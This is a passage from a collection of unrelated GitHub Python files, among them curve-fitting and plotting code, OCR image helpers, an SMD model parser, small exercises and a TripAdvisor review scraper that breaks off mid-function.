\\n'+\n 'FWHM=%0.3f (+/- %0.3f) \\n'+\\\n 'Res=%0.3f%% (+/- %0.3f) \\n'+\\\n 'chi2=%0.3f \\n'+'chi2inv_95=%0.3f \\n'+\\\n 'p=%0.3f') % \\\n (self.coeff[1] , self.perr[1],\n np.absolute(self.coeff[2]) , self.perr[2],\n 2.35*np.absolute(self.coeff[2]),\n 2.35*np.absolute(self.perr[2]),\n 2.35*np.absolute(self.coeff[2])*100/self.coeff[1],\n 2.35*np.absolute(self.coeff[2])*100/self.coeff[1]*\n np.sqrt((self.perr[2]/self.coeff[2])**2+\n (self.perr[1]/self.coeff[1])**2),\n self.xi2,\n chi2.ppf(0.95,len(self.bin_centers)-2-1),\n self.p\n )\n ),\n fontsize=8,\n verticalalignment='top',\n horizontalalignment='right',\n transform=axis.transAxes)\n\n\n else:\n # No resolution calculation\n axis.text(0.95,0.95, (('$\\mu$=%0.3f (+/- %0.3f) \\n'+\\\n '$\\sigma$=%0.3f (+/- %0.3f) \\n'+\n 'FWHM=%0.3f (+/- %0.3f) \\n'+\\\n 'chi2=%0.3f \\n'+'chi2inv_95=%0.3f \\n'+\\\n 'p=%0.3f') % \\\n (self.coeff[1], self.perr[1],\n np.absolute(self.coeff[2]), self.perr[2],\n 2.35*np.absolute(self.coeff[2]),\n 2.35*np.absolute(self.perr[2]),\n self.xi2,\n chi2.ppf(0.95,len(self.bin_centers)-2-1),\n self.p)),\n fontsize=8,\n verticalalignment='top',\n horizontalalignment='right',\n transform=axis.transAxes)\n\nclass gauss_fit2(fitting):\n\n def gauss2(x, *param):\n return param[0] * np.exp(-(x-param[1])**2/(2.*param[2]**2)) + \\\n param[3] * np.exp(-(x-param[4])**2/(2.*param[5]**2))\n\n def __call__(self, data, mu_guess, bins):\n self.p0 = [100, mu_guess[0], mu_guess[2], 100, mu_guess[1], mu_guess[3]]\n # First guess\n super(gauss_fit2,self).__call__(data=data,\n bins=bins,\n guess=self.p0,\n fit_func=self.gauss2)\n\n def plot(self,axis,title,xlabel,ylabel,res=True):\n axis.hist(self.data, self.bins, facecolor='green')\n axis.plot(self.bin_centers, self.hist_fit, 'r--', linewidth=1)\n axis.set_xlabel(xlabel)\n axis.set_ylabel(ylabel)\n axis.set_title(title)\n if (res==True):\n axis.text(0.05,0.8, (('$\\mu1$=%0.1f (+/- %0.1f) \\n'+\\\n '$\\sigma1$=%0.1f (+/- %0.1f) \\n'+\n 'FWHM1=%0.1f (+/- %0.1f) \\n'+\\\n 'Res1=%0.1f%% (+/- %0.1f)') % \\\n (self.coeff[1] , self.perr[1],\n np.absolute(self.coeff[2]) , self.perr[2],\n 2.35*np.absolute(self.coeff[2]),\n 2.35*np.absolute(self.perr[2]),\n 2.35*np.absolute(self.coeff[2])*100/self.coeff[1],\n 2.35*np.absolute(self.coeff[2])*100/self.coeff[1]*\n np.sqrt((self.perr[2]/self.coeff[2])**2+\n (self.perr[1]/self.coeff[1])**2)\n )\n ),\n fontsize=6,\n verticalalignment='top',\n horizontalalignment='left',\n transform=axis.transAxes)\n\n axis.text(0.05,1.0, (('$\\mu2$=%0.1f (+/- %0.1f) \\n'+\\\n '$\\sigma2$=%0.1f (+/- %0.1f) \\n'+\n 'FWHM2=%0.1f (+/- %0.1f) \\n'+\\\n 'Res2=%0.1f%% (+/- %0.1f)') % \\\n (self.coeff[4] , self.perr[4],\n np.absolute(self.coeff[5]) , self.perr[5],\n 2.35*np.absolute(self.coeff[5]),\n 2.35*np.absolute(self.perr[5]),\n 2.35*np.absolute(self.coeff[5])*100/self.coeff[4],\n 2.35*np.absolute(self.coeff[5])*100/self.coeff[4]*\n np.sqrt((self.perr[5]/self.coeff[5])**2+\n (self.perr[4]/self.coeff[4])**2)\n )\n ),\n fontsize=6,\n verticalalignment='top',\n horizontalalignment='left',\n transform=axis.transAxes)\n\n else:\n pass\n\n\ndef line_fit(f,X,f_sigma,x_text,y_text,title_text,n_figure,graph_sw):\n\n# Makes a linear fit for n points (X input vector).\n# f is the mean of the measured data points\n# f_sigma is the standard deviation (ddof=1) of the measured data points\n# The rest are attributes for the plotting windows (graph_sw = 1 to plot)\n# returns coeff (A,B), perr - error for the fit param,\n# XI2_r --> Squared CHI reduced (Goodness of fit)\n\n def line(x, A, B):\n return A*x + B\n\n p0 = [1,(f[1]-f[0])/(X[1]-X[0])]\n coeff, var_matrix = curve_fit(self.line, X, f,p0=p0)\n\n #Parameters error estimation (sigma). See numpy user guide\n perr = np.sqrt(np.diag(var_matrix))\n\n Y_fit = line(X,coeff[0],coeff[1])\n\n XI2 = np.sum(((Y_fit-f)**2.)/(f_sigma**2.))\n XI2_r = XI2/(len(X)-2)\n\n max_err = np.max(np.abs((Y_fit-f)/Y_fit))*100.0\n\n print ('Max Linearity Error = %0.3f%%' % max_err)\n\n if (graph_sw==1):\n # Draws figure with all the properties\n\n plt.figure(n_figure)\n plt.plot(X, Y_fit, 'r--', linewidth=1)\n plt.errorbar(X, f, fmt='b*', yerr=f_sigma)\n plt.xlabel(x_text)\n plt.ylabel(y_text)\n plt.title(title_text)\n plt.figtext(0.2,0.75, ('CHI2_r = %0.3f ' % (XI2_r)))\n plt.show(block=False)\n #Fit parameters\n print ('Fitted A = ', coeff[0], '( Error_std=', perr[0],')')\n print ('Fitted B = ', coeff[1], '( Error_std=', perr[1],')')\n\n return coeff, perr, XI2_r\n","repo_name":"ralfgad/alimentos","sub_path":"fit_library.py","file_name":"fit_library.py","file_ext":"py","file_size_in_byte":23292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"44204683807","text":"#-*- coding: utf-8 -*-\n\"\"\"\n@author:MD.Nazmuddoha Ansary,Mobassir Hossain\n\"\"\"\nfrom __future__ import print_function\n\n#---------------------------------------------------------------\n# imports\n#---------------------------------------------------------------\nfrom termcolor import colored\nimport os \nimport cv2 \nimport numpy as np\nfrom PIL import Image, ImageEnhance\nimport gdown\n#---------------------------------------------------------------\ndef LOG_INFO(msg,mcolor='blue'):\n '''\n prints a msg/ logs an update\n args:\n msg = message to print\n mcolor = color of the msg \n '''\n print(colored(\"#LOG :\",'green')+colored(msg,mcolor))\n#---------------------------------------------------------------\ndef create_dir(base,ext):\n '''\n creates a directory extending base\n args:\n base = base path \n ext = the folder to create\n '''\n _path=os.path.join(base,ext)\n if not os.path.exists(_path):\n os.mkdir(_path)\n return _path\n\ndef download(id,save_dir):\n gdown.download(id=id,output=save_dir,quiet=False)\n\n#------------------------------------\n# region-utils \n#-------------------------------------\ndef intersection(boxA, boxB):\n # boxA=ref\n # boxB=sig\n # determine the (x, y)-coordinates of the intersection rectangle\n xA = max(boxA[0], boxB[0])\n yA = max(boxA[1], boxB[1])\n xB = min(boxA[2], boxB[2])\n yB = min(boxA[3], boxB[3])\n # compute the area of intersection rectangle\n interArea = abs(max((xB - xA, 0)) * max((yB - yA), 0))\n x_min,y_min,x_max,y_max=boxB\n selfArea = abs((y_max-y_min)*(x_max-x_min))\n return interArea/selfArea\n#---------------------------------------------------------------\ndef localize_box(box,region_boxes):\n '''\n lambda localization\n '''\n max_ival=0\n box_id=-1\n for idx,region_box in enumerate(region_boxes):\n ival=intersection(region_box,box)\n if ival==1:\n return idx\n if ival>max_ival:\n max_ival=ival\n box_id=idx\n if max_ival==0:\n return -1\n return box_id\n#------------------------------------\n# image-utils \n#-------------------------------------\n#---------------------------------------------------------------\ndef remove_shadows(img):\n rgb_planes = cv2.split(img)\n result_norm_planes = []\n for plane in rgb_planes:\n dilated_img = cv2.dilate(plane, np.ones((7,7), np.uint8))\n bg_img = cv2.medianBlur(dilated_img, 21)\n diff_img = 255 - cv2.absdiff(plane, bg_img)\n norm_img = cv2.normalize(diff_img,None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8UC1)\n result_norm_planes.append(norm_img)\n\n result_norm = cv2.merge(result_norm_planes)\n return result_norm\n\ndef read_img(image):\n img=cv2.imread(image)\n img=cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n return img\n\n#---------------------------------------------------------------\n# recognition utils\n#---------------------------------------------------------------\ndef padData(img,pad_loc,pad_dim,pad_type,pad_val):\n '''\n pads an image with white value\n args:\n img : the image to pad\n pad_loc : (lr/tb) lr: left-right pad , tb=top_bottom pad\n pad_dim : the dimension to pad upto\n pad_type: central or left aligned pad\n pad_val : the value to pad \n '''\n \n if pad_loc==\"lr\":\n # shape\n h,w,d=img.shape\n if pad_type==\"central\":\n # pad widths\n left_pad_width =(pad_dim-w)//2\n # print(left_pad_width)\n right_pad_width=pad_dim-w-left_pad_width\n # pads\n left_pad =np.ones((h,left_pad_width,3))*pad_val\n right_pad=np.ones((h,right_pad_width,3))*pad_val\n # pad\n img =np.concatenate([left_pad,img,right_pad],axis=1)\n else:\n # pad widths\n pad_width =pad_dim-w\n # pads\n pad =np.ones((h,pad_width,3))*pad_val\n # pad\n img =np.concatenate([img,pad],axis=1)\n else:\n # shape\n h,w,d=img.shape\n # pad heights\n if h>= pad_dim:\n return img \n else:\n pad_height =pad_dim-h\n # pads\n pad =np.ones((pad_height,w,3))*pad_val\n # pad\n img =np.concatenate([img,pad],axis=0)\n return img.astype(\"uint8\") \n#---------------------------------------------------------------\ndef padWords(img,dim,ptype=\"central\",pvalue=255):\n '''\n corrects an image padding \n args:\n img : numpy array of single channel image\n dim : tuple of desired img_height,img_width\n ptype : type of padding (central,left)\n pvalue : the value to pad\n returns:\n correctly padded image\n\n '''\n img_height,img_width=dim\n mask=0\n # check for pad\n h,w,d=img.shape\n w_new=int(img_height* w/h) \n img=cv2.resize(img,(w_new,img_height),fx=0,fy=0, interpolation = cv2.INTER_NEAREST)\n h,w,d=img.shape\n if w > img_width:\n # for larger width\n h_new= int(img_width* h/w) \n img=cv2.resize(img,(img_width,h_new),fx=0,fy=0, interpolation = cv2.INTER_NEAREST)\n # pad\n img=padData(img,\n pad_loc=\"tb\",\n pad_dim=img_height,\n pad_type=ptype,\n pad_val=pvalue)\n mask=img_width\n\n elif w < img_width:\n # pad\n img=padData(img,\n pad_loc=\"lr\",\n pad_dim=img_width,\n pad_type=ptype,\n pad_val=pvalue)\n if mask>img_width:\n mask=img_width\n \n # error avoid\n img=cv2.resize(img,(img_width,img_height),fx=0,fy=0, interpolation = cv2.INTER_NEAREST)\n return img,mask \n#---------------------------------------------------------------\n# viz utils\n#---------------------------------------------------------------\ndef draw_boxes_from_text_dict(image,text_dict):\n for crop_dict in text_dict:\n ln=crop_dict[\"line_no\"]\n wn=crop_dict[\"word_no\"]\n box=crop_dict[\"poly\"]\n box = np.reshape(np.array(box), [-1,1,2]).astype(np.int64)\n image = cv2.polylines(image, [box], True,(255,0,0),2)\n x,y=box[0][0]\n image = cv2.putText(image,f\"{ln}-{wn}\",(x,y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 1, cv2.LINE_AA)\n return image\n\ndef draw_boxes(image,boxes):\n for idx,box in enumerate(boxes):\n box = np.reshape(np.array(box), [-1,1,2]).astype(np.int64)\n x,y=box[0][0]\n image = cv2.polylines(image, [box], True,(255,0,0),2)\n image = cv2.putText(image,str(idx),(x,y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 1, cv2.LINE_AA)\n return image\n\n \n","repo_name":"mobassir94/Multilingual-Reader","sub_path":"coreLib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6897,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"94"} +{"seq_id":"15152027452","text":"import numpy as np\n\ndef replacemat(triangle_list, orig, repl):\n for tri in triangle_list:\n if tri.matName == orig:\n tri.matName = repl\n\ndef buildVert(dataline: str):\n tokens = dataline.split()\n return VertexData(int(tokens[0]),\n np.array([float(tokens[1]), float(tokens[2]), float(tokens[3])]),\n np.array([float(tokens[4]), float(tokens[5]), float(tokens[6])]),\n np.array([float(tokens[7]), float(tokens[8])]))\n\ndef buildTriangle(data: list):\n return TriangleData([buildVert(data[1]), buildVert(data[2]), buildVert(data[3])],\n data[0].strip('\\n'))\n\nclass VertexData:\n def __init__(self, nodeID, pos: np.array, norm: np.array, texCoord: np.array):\n self.boneID = nodeID\n self.pos = pos\n self.norm = norm\n self.texCoord = texCoord\n\n def smdString(self):\n def fstr(d):\n return '{:.9f}'.format(d)\n return (str(self.boneID)+' '+fstr(self.pos[0])+' '+fstr(self.pos[1])+' '+fstr(self.pos[2])+' '\n + fstr(self.norm[0]) + ' '+fstr(self.norm[1])+' '+fstr(self.norm[2])+' '\n + fstr(self.texCoord[0]) + ' '+fstr(self.texCoord[1]))\n\n def translate(self, vec:np.array):\n return VertexData(self.boneID, self.pos+vec, self.norm, self.texCoord)\n\n def apply_transformation(self, rot_mat, translation):\n return VertexData(self.boneID, np.dot(self.pos, rot_mat) + translation, np.dot(self.norm, rot_mat), self.texCoord)\n\n\nclass TriangleData:\n def __init__(self, vertList: list, matName: str = 'undefined'):\n self.matName = matName\n self.verts = vertList\n\n def translate(self, vec: np.array):\n for vert in self.verts:\n vert.pos += vec\n\n def __add__(self, vec: np.array):\n return TriangleData([c.translate(vec) for c in self.verts], self.matName)\n\n def smdString(self):\n r_str = self.matName\n for x in self.verts:\n r_str += '\\n'+x.smdString()\n return r_str\n\n def apply_transformation(self, rot_mat, translation):\n return TriangleData([c.apply_transformation(rot_mat, translation) for c in self.verts], self.matName)\n\nclass TimeFrame:\n def __init__(self, data: list):\n self.index = int(data[0].split()[1])\n self.datastr = data[1].strip('\\n')\n\n def smdString(self):\n return 'time '+str(self.index)+'\\n'+self.datastr\n\n\nclass SMD:\n def __init__(self, filename: str = None):\n self.nodes = list()\n self.sequence = list()\n self.triangles = list()\n if filename is not None:\n file = open(filename, 'r')\n f_data = file.readlines()\n index = 0\n\n def seek(regex:str, index):\n while regex not in f_data[index]:\n index += 1\n return index\n\n index = seek(\"nodes\", index)\n index += 1\n while \"end\" not in f_data[index]:\n self.nodes.append(f_data[index].strip('\\n'))\n index += 1\n\n \"\"\"index = seek(\"skeleton\", index)\n index += 1\n while \"end\" not in f_data[index]:\n self.sequence.append(TimeFrame(f_data[index:index+2]))\n index += 2\"\"\"\n\n index = seek(\"triangles\", index)\n index += 1\n while \"end\" not in f_data[index]:\n self.triangles.append(buildTriangle(f_data[index:index+4]))\n index += 4\n self.matset = set()\n for tri in self.triangles:\n self.matset.add(tri.matName)\n\n def replace_mat(self, orig, repl):\n replacemat(self.triangles, orig, repl)\n\n def getsmdstring(self):\n r_str = ('//SMD Generated by Tile Script'\n '\\n//Author: SMD Generator'\n '\\nversion 1.0')\n r_str += '\\nnodes'\n for x in self.nodes:\n r_str += '\\n'+ x\n r_str += '\\nend'\n r_str += '\\nskeleton'\n for x in self.sequence:\n r_str += '\\n'+x.smdString()\n r_str += '\\nend'\n r_str += '\\ntriangles'\n for x in self.triangles:\n r_str += '\\n'+x.smdString()\n r_str += '\\nend'\n return r_str\n\n def write_to_file(self, filepath):\n r_str = self.getsmdstring()\n f = open(filepath+'.smd', 'w')\n f.write(r_str)\n f.close()\n\n#d = SMD('facade2_mesh.smd')\n#d.write_to_file('newmd')\n#print(len(d.triangles))\n#print(\"T\")\n\n","repo_name":"ZackFiner/SourceSDK-Batch-Model-Compiler","sub_path":"src/SMD.py","file_name":"SMD.py","file_ext":"py","file_size_in_byte":4480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24437221367","text":"\"\"\"\nFile: Milestone1.py\nName: \n-----------------------\nThis file tests the milestone 1 for\nour babyname.py project\n\"\"\"\n\nimport sys\n\n\ndef add_data_for_name(name_data, year, rank, name):\n \"\"\"\n :param name_data: dict, key: name of the new born baby, value(dict):the ranking of the name in particular year\n :param year: str, particular year\n :param rank: str, ranking of the name in that particular year\n :param name: str, the name of the new born baby\n \"\"\"\n if name in name_data: # if name already in the dictionary\n if year in name_data[name] and int(rank) < int(name_data[name][year]): # same name/year in both gender, use the lower rank\n name_data[name][year] = rank\n elif year not in name_data[name]: # adding a new year to the dictionary\n name_data[name][year] = rank\n else:\n name_data[name] = {year: rank} # if it's new name in the dictionary, just add it\n\n\n# ------------- DO NOT EDIT THE CODE BELOW THIS LINE ---------------- #\n\n\ndef test1():\n name_data = {'Kylie': {'2010': '57'}, 'Nick': {'2010': '37'}}\n add_data_for_name(name_data, '2010', '208', 'Kate')\n print('--------------------test1----------------------')\n print(str(name_data))\n print('-----------------------------------------------')\n\n\ndef test2():\n name_data = {'Kylie': {'2010': '57'}, 'Nick': {'2010': '37'}}\n add_data_for_name(name_data, '2000', '104', 'Kylie')\n print('--------------------test2----------------------')\n print(str(name_data))\n print('-----------------------------------------------')\n\n\ndef test3():\n name_data = {'Kylie': {'2010': '57'}, 'Sammy': {'1980': '451', '1990': '200'}, 'Kate': {'2000': '100'}}\n add_data_for_name(name_data, '1990', '900', 'Sammy')\n add_data_for_name(name_data, '2010', '400', 'Kylie')\n add_data_for_name(name_data, '2000', '20', 'Kate')\n print('-------------------test3-----------------------')\n print(str(name_data))\n print('-----------------------------------------------')\n\n\ndef test4():\n name_data = {'Kylie': {'2010': '57'}, 'Nick': {'2010': '37'}}\n add_data_for_name(name_data, '2010', '208', 'Kate')\n add_data_for_name(name_data, '2000', '108', 'Kate')\n add_data_for_name(name_data, '1990', '200', 'Sammy')\n add_data_for_name(name_data, '1990', '90', 'Sammy')\n add_data_for_name(name_data, '2000', '104', 'Kylie')\n print('--------------------test4----------------------')\n print(str(name_data))\n print('-----------------------------------------------')\n\n\ndef main():\n args = sys.argv[1:]\n if len(args) == 1 and args[0] == 'test1':\n test1()\n elif len(args) == 1 and args[0] == 'test2':\n test2()\n elif len(args) == 1 and args[0] == 'test3':\n test3()\n elif len(args) == 1 and args[0] == 'test4':\n test4()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ShuyunLiu/Python_projects","sub_path":"Python_projects/Name Popularity Searching System/milestone1.py","file_name":"milestone1.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"5932568799","text":"class Solution:\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n \"\"\"\n 1. Create adjacency list pattern:words\n 2. Do BFS\n \n \"\"\"\n \n nei = collections.defaultdict(list)\n wordList.append(beginWord)\n \n for word in wordList:\n for i in range(len(word)):\n pattern = word[:i] + \"*\" + word[i+1:]\n nei[pattern].append(word)\n \n q = deque([beginWord])\n visited = set([beginWord])\n \n res = 1\n while q:\n for i in range(len(q)):\n word = q.popleft()\n if word == endWord:\n return res\n for j in range(len(word)):\n pattern = word[:j] + \"*\" + word[j+1:]\n for neighbor in nei[pattern]:\n if neighbor not in visited:\n visited.add(neighbor)\n q.append(neighbor)\n res +=1\n return 0","repo_name":"shubhroses/Leetcode","sub_path":"hard_question/127_Word_Ladder.py","file_name":"127_Word_Ladder.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"1075410780","text":"from openpyxl import load_workbook\r\nimport aspose.words as aw\r\nvalue0 = 0\r\n\r\n\r\n### Main Loop ###\r\n\r\nwhile True:\r\n\r\n ### Interact with spreadsheet ###\r\n\r\n cell_row = 3\r\n chosen_mail_draft = 'mail_draft.docx' #input (\"Podaj nazwę drafta maila: \\n\") + \".docx\"\r\n chosen_workbook = input (\"Podaj nazwę pliku excel: \\n\") + \".xlsx\"\r\n chosen_worksheet = input (\"Podaj nazwę arkusza: \\n\")\r\n limit = int(input(\"Ile maili chcesz otrzymać (licząć od góry): \\n\"))\r\n run = True\r\n \r\n while run:\r\n\r\n ### get info from cell ### \r\n \r\n cn_cell_coordinates = 'A' + str(cell_row)\r\n workbook = load_workbook(chosen_workbook)\r\n worksheet = workbook[chosen_worksheet]\r\n cn_cell = (worksheet[cn_cell_coordinates].value)\r\n\r\n gender_cell_coordinates = 'B' + str(cell_row)\r\n gn_cell = (worksheet[gender_cell_coordinates].value) \r\n\r\n mail_cell_coordinates = 'D' + str(cell_row)\r\n mail_cell = (worksheet[mail_cell_coordinates].value)\r\n\r\n\r\n ### set the greeting ###\r\n\r\n\r\n if gn_cell == 'f':\r\n greeting_text = \"Szanowna Pani,\"\r\n elif gn_cell == 'm':\r\n greeting_text = \"Szanowny Panie,\"\r\n else:\r\n greeting_text = 'Szanowni Państwo, ' \r\n\r\n ### replace words in document and save new document ###\r\n\r\n doc = aw.Document(chosen_mail_draft)\r\n \r\n doc.range.replace('((company_name))', cn_cell, aw.replacing.FindReplaceOptions(aw.replacing.FindReplaceDirection.FORWARD))\r\n doc.range.replace('((greeting))', greeting_text, aw.replacing.FindReplaceOptions(aw.replacing.FindReplaceDirection.FORWARD))\r\n doc.range.replace('((company_mail))', mail_cell, aw.replacing.FindReplaceOptions(aw.replacing.FindReplaceDirection.FORWARD))\r\n # print ('mail{}.docx'.format(value0 + 1))\r\n print('SKN B nie ma biura')\r\n doc.save(\"mail do {}.docx\".format(cn_cell))\r\n\r\n value0 += 1\r\n cell_row += 1\r\n\r\n if value0 == limit:\r\n run = False\r\n break\r\n","repo_name":"PiotrT22/Basic-python-programms","sub_path":"auto-mail-filling.py","file_name":"auto-mail-filling.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"42890696763","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/2/15 10:26\n# @Author : Bilon\n# @File : 协程.py\nimport time\n\n\ndef fun():\n i = 0\n while True:\n value = yield i\n if value is not None:\n print('接到任务...')\n time.sleep(1)\n i = value + 1\n print('完成任务...')\n\n\ndef run(cor):\n next(cor)\n for i in range(3):\n num = cor.send(i) # 执行其它子程序\n print('当前数字:', num)\n cor.close()\n\n\ndef odds(max_num): # 定义子生成器\n odd = 1 # 起始奇数\n count = 0 # 获取次数\n while odd <= max_num: # 循环获取到最大奇数值\n value = yield odd # 生成奇数\n odd += 2 # 计算下一个奇数\n count += 1 # 生成次数递增\n if value is None or True: # 获取外部传入的值\n print('第', count, '个奇数生成成功...')\n return count # 返回生成次数\n\n\ndef copy_odds(max_num): # 定义委托生成器\n print('-' * 8, '开始', '-' * 8)\n count = yield from odds(max_num) # 获取生成器部分操作以及返回值\n print('-' * 8, '完成', '-' * 8)\n print('共生成了', count, '个奇数。')\n\n\nif __name__ == '__main__':\n\n # cor = fun()\n # run(cor)\n\n gen = copy_odds(9) # 创建生成器对象\n print(gen.send(None)) # 挂起生成器\n while True:\n try:\n print(gen.send(True)) # 运行一次生成器并将值传入\n except: # 迭代结束跳出循环\n break\n","repo_name":"dopqob/Python","sub_path":"Python学习笔记/进程丨线程丨协程/协程.py","file_name":"协程.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"22109669277","text":"n, m = map(int, input().split())\n\ntable = [[0] * (i + 1) for i in range(1, n + 1)]\nfor i in range(0, n):\n table[i][0] = 1\n table[i][-1] = 1\n\nfor i in range(0, n):\n for j in range(1, i + 1):\n table[i][j] = table[i - 1][j] + table[i - 1][j - 1]\n\nprint(table[n - 1][m])","repo_name":"sarmsoo/baekjoon","sub_path":"Algo/baek/2407.py","file_name":"2407.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"26110850731","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom selenium import webdriver\nimport time\nimport requests\nfrom scrapy.http import TextResponse\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\nfrom scrapy.http import TextResponse\nimport pandas as pd\nimport numpy as np\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import NoSuchElementException\nimport re\n\n\n# In[2]:\n\n\ndef get_response(URL: str, Headers):\n \"\"\"\n This function takes URL as an input and provides response:\n - none is status code is not 200\n - scrapy TextResponse object otherwise\n \"\"\"\n page = requests.get(URL, headers = Headers )\n if page.status_code == 200:\n response = TextResponse(body=page.text,url=page.url,encoding=\"utf-8\")\n else:\n response = None\n print(\"wrong status code\")\n return response\n\n\n# # About hotel\n\n# In[6]:\n\n\nURL = 'https://www.tripadvisor.com/Hotel_Review-g293932-d23804505-Reviews-or10-Dave_Hotel_Yerevan-Yerevan.html#REVIEWS'\n\n\n# In[7]:\n\n\nuser_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36'\n\nHeaders = {'User-Agent': user_agent}\n\n\n# In[8]:\n\n\ndef hotel_info_scraper(URL : str, Headers = Headers):\n response = get_response(URL, Headers)\n title = response.css(\"h1::text\").extract_first()\n num_views = response.css('span.qqniT::text').extract_first()\n adress = response.css('span.fHvkI.PTrfg::text').extract_first()\n overall_rating = response.css('span.uwJeR.P::text').extract_first()\n location_score = response.css(\"div.SSDgd > div.WdWxQ:nth-child(1) > span::text\").extract()[1]\n cleanness_score = response.css(\"div.SSDgd > div.WdWxQ:nth-child(2) > span::text\").extract()[1]\n service_score = response.css(\"div.SSDgd > div.WdWxQ:nth-child(3) > span::text\").extract()[1]\n value_score = response.css(\"div.SSDgd > div.WdWxQ:nth-child(4) > span::text\").extract()[1]\n data = {'title' : title, 'num_views' : num_views, \"adress\" : adress, 'overall_rating' : overall_rating,\n 'location_score' : location_score , 'cleanness_score' : cleanness_score, 'service_score' : service_score,\n \"value_score\" : value_score}\n return data\n\n\n# In[9]:\n\n\ndata = hotel_info_scraper(URL)\n\n\n# In[10]:\n\n\ndata\n\n\n# # comment scraper\n\n# In[29]:\n\n\nopts = Options()\nopts.add_argument(\"--headless\")\nopts.add_argument(\"--disable-infobars\")\nopts.add_argument(\"start-maximized\")\nopts.add_argument(\"--disable-extensions\")\nopts.add_argument('--disable-notifications')\nopts.add_argument(\"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36\")\nPATH = r\"/Users/gevorgatanesyan/Downloads/chromedriver\"\n\n\n# In[30]:\n\n\ndef hotel_comment_scraper(URL : str):\n s = Service(PATH)\n browser = webdriver.Chrome(service=s, options=opts)\n browser.get(URL)\n \n time.sleep(4)\n browser.find_element(by=By.CSS_SELECTOR, value = \"h2[class ='aFUwN Cj F1 b']\").click() \n \n time.sleep(2)\n \n browser.execute_script(\"window.scrollTo(0, document.body.scrollHeight/4)\") \n\n time.sleep(4)\n \n try:\n time.sleep(5)\n browser.find_element(by=By.CSS_SELECTOR, value = 'ul[class = \"LojWi w S4\"] > li[class = \"ui_radio XpoVm\"]:nth-child(1)').click()\n time.sleep(5)\n browser.find_element(by=By.CSS_SELECTOR,value = 'ul[class = \"LojWi w S4\"] > li[class = \"ui_radio XpoVm\"]:nth-child(1)').click()\n time.sleep(5)\n except:\n try:\n browser.find_element(by=By.CSS_SELECTOR, value = 'ul[class = \"LojWi w S4\"] > li[class = \"ui_radio XpoVm\"]:nth-child(1)').click() \n except:\n print('i')\n \n try:\n browser.find_element(by=By.CSS_SELECTOR,value = \"span.Ignyf._S.Z\").click()\n except:\n pass\n \n \n\n comments = []\n rated = []\n locations = []\n contributions = []\n date_of_stay = []\n review_identical = []\n date_posted = []\n \n page = browser.page_source\n response = TextResponse(body = page,encoding=\"utf-8\", url = URL)\n review_identical_css = response.css('div[class = \"vTVDc\"]')\n comment_css = response.css(\"q\")\n location_css = response.css(\"div.MziKN \")\n \n comments.append([','.join(i) for i in [i.css('span::text').extract() for i in comment_css]])\n rated.append([re.findall('\\d', i)[0] for i in response.css(\"div[class ='Hlmiy F1'] > span\").extract()])\n locations.append([i.css('span.RdTWF > span::text').extract() for i in location_css])\n contributions.append([i.css('span:nth-child(1) > span.yRNgz::text').extract_first() for i in location_css])\n date_of_stay.append(response.css(\"span[class = 'teHYY _R Me S4 H3']::text\").extract())\n review_identical.append([i.css('div[class = \"ZzICe Me f\"] > div > span').extract() for i in review_identical_css])\n date_posted.append(response.css('div[class = \"cRVSd\"] > span::text').extract())\n \n \n \n while True:\n try:\n try:\n browser.find_element(by=By.CSS_SELECTOR,value = \"span.Ignyf._S.Z\").click()\n except:\n pass\n time.sleep(5)\n browser.find_element(by=By.CSS_SELECTOR, value = \"a[class ='ui_button nav next primary ']\").click() \n time.sleep(3)\n page = browser.page_source\n response = TextResponse(body = page,encoding=\"utf-8\", url = URL)\n \n review_identical_css = response.css('div[class = \"vTVDc\"]')\n comment_css = response.css(\"q\")\n location_css = response.css(\"div.MziKN \")\n \n comments.append([','.join(i) for i in [i.css('span::text').extract() for i in comment_css]])\n rated.append([re.findall('\\d', i)[0] for i in response.css(\"div[class ='Hlmiy F1'] > span\").extract()])\n locations.append([i.css('span.RdTWF > span::text').extract() for i in location_css])\n contributions.append([i.css('span:nth-child(1) > span.yRNgz::text').extract_first() for i in location_css])\n date_of_stay.append(response.css(\"span[class = 'teHYY _R Me S4 H3']::text\").extract())\n review_identical.append([i.css('div[class = \"ZzICe Me f\"] > div > span').extract() for i in review_identical_css])\n date_posted.append(response.css('div[class = \"cRVSd\"] > span::text').extract())\n \n except NoSuchElementException:\n break \n\n \n data = {'comments':comments, 'rated':rated, 'locations':locations, 